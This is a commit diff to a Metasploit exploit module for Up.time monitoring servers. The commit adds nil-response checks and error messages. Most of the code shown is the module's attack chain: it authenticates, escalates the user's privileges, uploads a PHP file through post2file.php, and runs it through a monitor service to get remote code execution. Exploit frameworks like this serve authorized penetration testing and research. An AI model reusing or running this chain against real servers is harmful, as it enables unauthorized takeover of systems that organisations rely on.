Handle more NilClass bugs

Author: wchen-r7

modules/exploits/multi/http/uptime_file_upload_2.rb

@@ -74,6 +74,10 @@ def print_good(msg='')
     super("#{rhost}:#{rport} - #{msg}")
   end
 
+  def fail_with(status, msg)
+    super(status, "#{rhost}:#{rport} - #{msg}")
+  end
+
   # Application Check
   def check
     res = send_request_cgi(
@@ -195,13 +199,17 @@ def exploit
       'method' => 'POST',
       'uri'    => normalize_uri(target_uri.path, 'index.php'),
       'vars_post' => {
-        'username'          => datastore['USERNAME'],
-        'password'          => datastore['PASSWORD']
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
       })
 
+    unless res_auth
+      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
+    end
+
     # Check OS
     phpfile_name = rand_text_alpha(10)
-    if res_auth && res_auth.headers['Server'] =~ /Unix/
+    if res_auth.headers['Server'] =~ /Unix/
       vprint_status('Found Linux installation - Setting appropriated PATH')
       phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
       uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')
@@ -216,7 +224,7 @@ def exploit
       cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
     end
 
-    if res_auth && res_auth.get_cookies =~ /login=true/
+    if res_auth.get_cookies =~ /login=true/
       cookie = Regexp.last_match(1)
       cookie_split = res_auth.get_cookies.split(';')
       vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
@@ -232,7 +240,17 @@ def exploit
         },
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
       )
+
+      unless res_priv
+        fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
+      end
+
       matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
+
+      unless matchdata
+        fail_with(Failure::Unknown, 'Unable to find userID for escalation')
+      end
+
       get_id = matchdata[0].gsub(/[^\d]/, '')
       vprint_status('Escalating privileges...')
 
@@ -273,14 +291,22 @@ def exploit
         }
       )
 
+      unless res_priv_elev
+        fail_with(Failure::Unknown, 'Connection timed out while escalating...')
+      end
+
       # Refresing perms
-      vprint_status('Refresing perms...')
+      vprint_status('Refreshing perms...')
       res_priv = send_request_cgi(
         'method' => 'GET',
         'uri'    => normalize_uri(target_uri.path, 'index.php?loggedout'),
         'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
       )
 
+      unless res_priv
+        fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
+      end
+
       res_auth = send_request_cgi(
         'method' => 'POST',
         'uri'    => normalize_uri(target_uri.path, 'index.php'),
@@ -289,15 +315,20 @@ def exploit
           'password' => datastore['PASSWORD']
         }
       )
-      if res_auth && res_auth.get_cookies =~ /login=true/
+
+      unless res_auth
+        fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
+      end
+
+      if res_auth.get_cookies =~ /login=true/
         cookie = Regexp.last_match(1)
         cookie_split = res_auth.get_cookies.split(';')
         vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
         print_good('Priv. Escalation success')
       end
 
       # CREATING Linux EXEC Service
-      if res_auth && res_auth.headers['Server'] =~ /Unix/
+      if res_auth.headers['Server'] =~ /Unix/
         vprint_status('Creating Linux Monitor Code exec...')
         create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
 
@@ -309,7 +340,7 @@ def exploit
 
       # Upload file
       vprint_status('Uploading file...')
-      send_request_cgi(
+      up_res = send_request_cgi(
         'method' => 'POST',
         'uri'    => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
         'vars_post' => {
@@ -318,6 +349,10 @@ def exploit
         }
       )
 
+      unless up_res
+        fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
+      end
+
       vprint_status('Checking Uploaded file...')
       res_up_check = send_request_cgi(
         'method' => 'GET',
@@ -328,6 +363,7 @@ def exploit
         print_good("File found: #{phpfile_name}")
       else
         print_error('File not found')
+        return
       end
 
       # Get Monitor ID
@@ -345,7 +381,16 @@ def exploit
         }
        )
 
+      unless res_mon_id
+        fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
+      end
+
       matchdata = res_mon_id.body.match(/id=?[^>]*>/)
+
+      unless matchdata
+        fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
+      end
+
       mon_get_id = matchdata[0].gsub(/[^\d]/, '')
       print_good("Monitor id aquired:#{mon_get_id}")
       # Executing monitor